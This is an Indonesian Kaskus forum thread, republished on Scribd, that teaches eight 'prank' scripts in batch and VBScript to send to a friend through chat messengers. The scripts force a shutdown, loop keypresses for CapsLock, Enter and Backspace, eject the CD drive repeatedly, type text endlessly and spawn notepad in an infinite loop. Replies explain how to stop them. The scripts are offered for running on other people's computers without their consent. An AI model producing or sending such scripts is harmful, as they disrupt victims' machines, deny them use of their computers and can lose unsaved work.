P. 1
8 Cara Menjaili Komputer Teman Agan

8 Cara Menjaili Komputer Teman Agan

|Views: 49|Likes:
Published by Juragan Cendol

More info:

Published by: Juragan Cendol on Feb 25, 2011
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOCX, PDF, TXT or read online from Scribd
See more
See less

02/25/2011

pdf

text

original

8 Cara Menjaili Komputer Teman Agan

,,,

selamat pagi agan/wati ,, ane mw sedikit berbagi ilmu nih mudah"an aja bermanfaat (atau ambil manfaatnya) ,, di trit ini ane kaga ada maksud buruk atau apapun itu, ane cm mau berbagi ilmu saja gan tanggung jawab ane jadi segala bentuk resiko dan tindakan agan/wati, itu diluar

DIMOHON SEBELUM MEMBACA INTI DARI TRIT INI, BACA SPOILER DIBAWAH INI DULU
Spoiler for SYARAT UTAMA:
pengiriman file bisa via yahoo Messenger, MSN, GoogleTalk, Skype dan semua fasilitas chat messenger yang mendukung pengiriman file ralat ane gan kalo ane salah

Spoiler for PERHATIAN ,, PERHATIAN ,, HARUS DIPERHATIKAN !!:

UPDATE :
ada tambahan nih dari agan gamaujomblo yang baik ngasih tau cara ngebalikinnya tadinya ane mau biarin dulu ga

biar kita bisa sharing ilmu gan ,, tapi agan gamaujomlo ngasih tau duluan nih Quote: Originally Posted by gamaujomblo parah kasian lo gan,, ini ane ksih tw cara berhentiin.a brani brbuat,,hrus brani brtanggung jawab Quote: Originally Posted by L.o.v.e. cara paling gampang gan : (kalo misalnya main di warnet)

matiin aja langsung listriknya

Efeknya : paling lu di hajar sm dia Quote: Originally Posted by gitar butut gan. itu cara 7 biar loopnya bisa dibatasi gmn ya? anjir, tadi gue nyoba di kompie sendiri, kwalahan gitu. hahaha. untung berhasil gue end process.

nah ini agan yang HEBAT menurut ane pula cara menghentikan prosesnya salut buat agan

,, dia praktek sendiri dengan korban dirinya sendiri ,, tau

gitar butut ane taro pekiwan gan

Quote: Originally Posted by isimfail

ane barusan dah nyoba semuanye di kompi ane sendiri gan...,wuih maknyoss... sempet kerepotan jg sih tp ane dah nemu jg obat2nya hehehe..., buat TS nice

share...
makasi banyak gan udah mau berani mencoba praktekin trit ane Quote: Originally Posted by daburu nais inpo ni gan... salah satu udah pernah ane coba, tapi yang caps, num, scroll locknya yang mati idup mati idup Quote: Originally Posted by Pochii wah... asik gan... da ane coba yg pertama... untung ane tau cra matiinya jd ga perlu

shutdown.... thx inpo gan...

satu lagi nambah pengalaman agan/wati yang sukses dengan trit ini ane taro dipekiwan nih kesuksesan agan

bagus gan

,,,

Mari langsung aja Spoiler for JAIL ,, JAIL ,, JAIL: Spoiler for CARA 1: syntax ini dibuat dalam notepad : @echo off msg * I don't like you shutdown -c "Error! You are too ******!" -s Simpan dengan nama file : terserah_agan.BAT ,, type file : All File dan kirimkan efeknya adalah saat korban menerima file kiriman agan, maka komputernya otomatis FORCED SHUTDOWN Spoiler for CARA 2: syntax ini dibuat dalam notepad : Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan efeknya adalah saat korban menerima file kiriman agan, maka tombol CAPSLOCK kibornya akan terus menyala (bila agan matikan maka tombolnya otomatis nyala lagi)

Spoiler for CARA 3: syntax ini dibuat dalam notepad : Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan efeknya adalah saat korban menerima file kiriman agan, maka CD Drive korban akan pop out (bhsa indonesianya apa ya ??) terus menerus ,,, (bila agan matikan maka tombolnya otomatis nyala lagi) Spoiler for CARA 4: syntax ini dibuat dalam notepad : Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan efeknya adalah saat korban menerima file kiriman agan, maka tombol ENTER korban akan nyala terus menerus Spoiler for CARA 5: syntax ini dibuat dalam notepad : WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "notepad"

WScript.Sleep 100 WshShell.AppActivate "Notepad" WScript.Sleep 500 WshShell.SendKeys "Hel" WScript.Sleep 500 WshShell.SendKeys "lo " WScript.Sleep 500 WshShell.SendKeys ", ho" WScript.Sleep 500 WshShell.SendKeys "w a" WScript.Sleep 500 WshShell.SendKeys "re " WScript.Sleep 500 WshShell.SendKeys "you" WScript.Sleep 500 WshShell.SendKeys "? " WScript.Sleep 500 WshShell.SendKeys "I a" WScript.Sleep 500 WshShell.SendKeys "m g" WScript.Sleep 500 WshShell.SendKeys "ood" WScript.Sleep 500 WshShell.SendKeys " th" WScript.Sleep 500 WshShell.SendKeys "ank" WScript.Sleep 500 WshShell.SendKeys "s! " Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan efeknya adalah otomatis membuka notepad korban dan akan muncul tulisan "Hello, how are you? I am good thanks" secara SLOW MOTION kalimat "Hello, how are you? I am good thanks" ,, bisa agan rubah sesuai selera, tinggal ubah saja frase kata dalam tanda kutip di syntax diatas Spoiler for CARA 6: syntax ini dibuat dalam notepad : MsgBox "Let's go back a few steps" Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}"

loop Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan efeknya adalah mirip dengan cara ke 4, syntax yang ini akan menekan tombol BACKSPACE korban terus menerus Spoiler for CARA 7: syntax ini dibuat dalam notepad : Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "Aku Berlindung Kepada Allah SWT Dari Godaan Nurdin Halid Yang Terkutuk !!." loop Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan efeknya adalah, kibord korban akan otomatis menuliskan kalimat "Aku Berlindung Kepada Allah SWT Dari Godaan Nurdin Halid Yang Terkutuk !!." secara terus menerus, dalam format pengetikan apapun "Aku Berlindung Kepada Allah SWT Dari Godaan Nurdin Halid Yang Terkutuk !!." <<< kalimat ini bisa agan ganti sesuai selera Spoiler for CARA 8: syntax ini dibuat dalam notepad : @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Simpan dengan nama file : terserah_agan.BAT ,, type file : All File dan kirimkan efeknya adalah saat korban menerima file kiriman agan, maka komputer korban akan menghidupkan perintah notepad.exe terus menerus

TAMBAHAN dari agan CENDOLSLOVERS nih ,, cekidood

:

maaf agan CENDOLSLOVERS

kaga muat lagi di edit dimari gan

ane kasih notif aja ya

tambahan agan ini ada di halaman 15 post #284 tambahan nice share gan! ane nyobain stu2 tapi kayanya ada beberapa yang harus restart dengan cara kejam gan ane mau nambahin niih nih kode nya Spoiler for kodenaya: Quote: lol=msgbox("isi capcay berikut ini") lol=msgbox(">ingat>>1u30kr<<ingat<") lol=msgbox("apakah anda masih ingat?") lol=msgbox("ketikan kode yang tadi") lol=msgbox("WRONG-udah ah lu mah kaga bisa inget padahal cuma 7 hurup doang") lol=msgbox("WRONG-udah ah lu mah kaga bisa inget padahal cuma 7 hurup doang") lol=msgbox("WRONG-udah ah lu mah kaga bisa inget padahal cuma 7 hurup doang") lol=msgbox("WRONG-udah ah lu mah kaga bisa inget padahal cuma 7 hurup doang") lol=msgbox("WRONG-udah ah lu mah kaga bisa inget padahal cuma 7 hurup doang") lol=msgbox("WRONG-udah ah lu mah kaga bisa inget padahal cuma 7 hurup doang")

yang bertuliskan merah bisa anda ganti2 sesuka anda.. Sedikit penjelasan ts Assalamu'alaikum agan/wati yang terhormat, semua kaskuser yg ane sayang (lebay dikit boleh dong ). terima kasih ane ucapin buat agan/wati semua, maaf juga ane ga bisa jawab satu-satu

pertanyaan/keluhan agan disini, maklum gan ane ga setiap jam ngaskus

, ane kan

KULI juga mesti nyari duit gan . ada beberapa poin disini yg ane tangkep dari semua pertanyaan/keluhan agan/wati kaskuser semua : Quote:

1. ketakutan terhadap program virus, 2. cara me non-aktif kan nya, 3. cara pengiriman, 4. bahasa program. yang bisa ane jelaskan disini (maaf kalo ane salah, jika ada yg mau menambahkan/koreksi silahkan ane terima dengan ikhlas dan lapangan dada Quote: 1. virus : menurut pandangan ane yang masih cupu nista ini, virus terbagi 3 kategori. Weak virus, Medium Virus, killer Virus. WEAK VIRUS adalah sejenis virus dimana keberadaan dia sebagai virus tidak bisa dibilang berbahaya bagi komputer, karena virus tsb tdk bisa invisible, mereproduksi dan menjalankan perintahnya sendiri terhadap komputer. dia butuh bantuan dari pengguna (user : manusia) untuk beraksi. Jd, jika virus semacam ini tidak kita eksekusi sedemikian rupa maka dia tidak akan berbahaya sama sekali. kalaupun dieksekusi, bahayanya tidak akan sampai merusak tatanan komputer itu sendiri. ANALOGI nya : ibarat agan kalo lagi garuk" bentol, efeknya cuma lecet aja kan ga sampai mati . ada jg MEDIUM VIRUS, adalah virus dimana dia bisa menetap dlm suatu komputer tanpa bisa terdeteksi (invisible), tp mirip juga dgn weak virus, diaa masih butuh bantuan USER agar bisa menjalankan perintahnya. sialnya, jika virus jenis ini dieksekusi, maka dia bisa mengacaukan beberapa bagian komputer, misal RAM, Hard Disk, Dll. Terakhir KILLER VIRUS, adalah virus dimana dia sudah seperti ROBOT buatan pilem Hollywood ,, virus ini sudah bisa reproduksi sendiri, aktivasi otomatis, dan juga invisibilitas yang kuat. Jika agan sudah terserang virus begini, mendingan install ulang aja drpd ribet PESAN TS : virus yang ane buat di trit ini adalah sejenis WEAK VIRUS, dimana dia tidak bisa mereproduksi sendiri, aktivasi perintah otomatis, dan juga visibilitas dengan kualitas rendah. Jadi sangat aman karena semua kendali masih ada ditangan USER (manusia : baca agan/wati). Quote: 2. cara non aktif (disable) : bisa task manager (end process), bisa hard boot, bisa juga proteksi deep freeze terserah mana yg terbaik menurut agan ,, jika sudah bisa di-disable-kan maka script yg agan buat itu ga bisa berbuat apa-apa lagi. Ibarat sapu lidi, kan ga mungkin nyapu halaman dengan sendirinya pasti butuh bantuan agan/wati yg rajin Quote: 3. pengiriman file : agan harus punya fasilitas pengiriman file seperti Yahoo Messenger, Skype, GoogleTalk, MSN ).

atau apapun yang mendukung fitur tersebut. ada yg nanya di CHAT FACEBOOK bisa ga ?? menurut ane, ya jelas ga bisa, karena YM, MSN, Skype dll itu berbeda platform nya gan lagipula setau ane chat FB ga bisa dipake ngirim file. proses pengiriman file jika agan make YM, ya korban yang agan pilih harus pemakai YM juga, ga bisa jika agan pake YM sementara korban pake MSN dan begitu seterusnya. FIle kiriman agan tidak akan pernah bereaksi apa-apa (alias letoy) jika tidak dieksekusi oleh korban (eksekusi :baca klik kanan/dobel klik). Quote: 4. bahasa program script yang ane buat dalam trit ini, ane pake bahasa pemrograman Visual Basic gan nih perbedaan dan fungsi ekstensi file nya ,,, BAT = File Batch, Sebuah file text yang berisi beberapa perintah yang secara segaja untuk di eksekusi oleh command prompt. ASM = Source Code Pemrograman Assembly REG = File Registry, Dapat dibuka dengan aplikasi Regedit atau Notepad juga VBS = File bahasa program untuk program aplikasi. TIPS TS :
sebelum agan menjalankan kenakalan agan menjaili kompi temen agan persiapkan terlebih dulu beberapa hal :

Quote: 1. Mandi, shalat, berdo'a semoga diberi kemudahan dan kelancaran ,, AMIN kalo ini kaga boleh ada yang ngebantah HARUS DAN WAJIB !! Quote: 2.Install aplikasi chat messenger (YM / MSN / Skype / GoogleTalk / Dll). lalu cari deh temen agan yg mau dijadiin korban percobaan kenakalan agan, dan jelas jika agan make YM, maka korban pun harus pemakai YM juga. ane sih paling sering pake Yahoo Messenger. sumpah gan seumur-umur ane belum pernah ngerasain pake MSN Quote: 3. Install Aplikasi Deep Freeze. nah kalo yang ini, buat berjaga-jaga jika terjadi suatu hal diluar kendali ane atau agan misalnya agan salah kopas atau ada sedikit bagian dari perintah script nya yang tidak disengaja kehapus (human error). jadi nanti bila ada kesalahan, agan ga usah kerepotan komputer hang

atau error, tinggal restart aja kompi agan pasti semua berjalan lancar Quote: 4. Sharing Partner. ane nulis judul ini SHARING PARTNER ,, bukan SPARRING PARTNER. Dalam artian, agan harus punya temen yang mau agan ajak berbagi ilmu dan pengalaman, khususnya dalam hal praktek script ini jadi agan juga bisa leluasa menjalankan niat JAIL agan tanpa harus terbebani takut error atau terjadi kesalahan diluar kendali. kan namanya juga belajar mencoba mempraktekkan gan nanti pada saatnya agan sudah mahir praktekin ini script, baru dah silakan aja kalo mau jailin komputernya NURDIN HALIDSHIT juga ane DUKUNG gan Segitu dulu kali yah gan sedikit pencerahan dari ane maklum ane juga masih cupu gan jika masih ada yg butuh penjelasan lebih lanjud, silahkan cari juga pengetahuan di internet kan banyak tuh gan Wassalam ,, semoga agan/wati kaskuser bisa mengambil manfaat dari trit ane ini

,,,

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->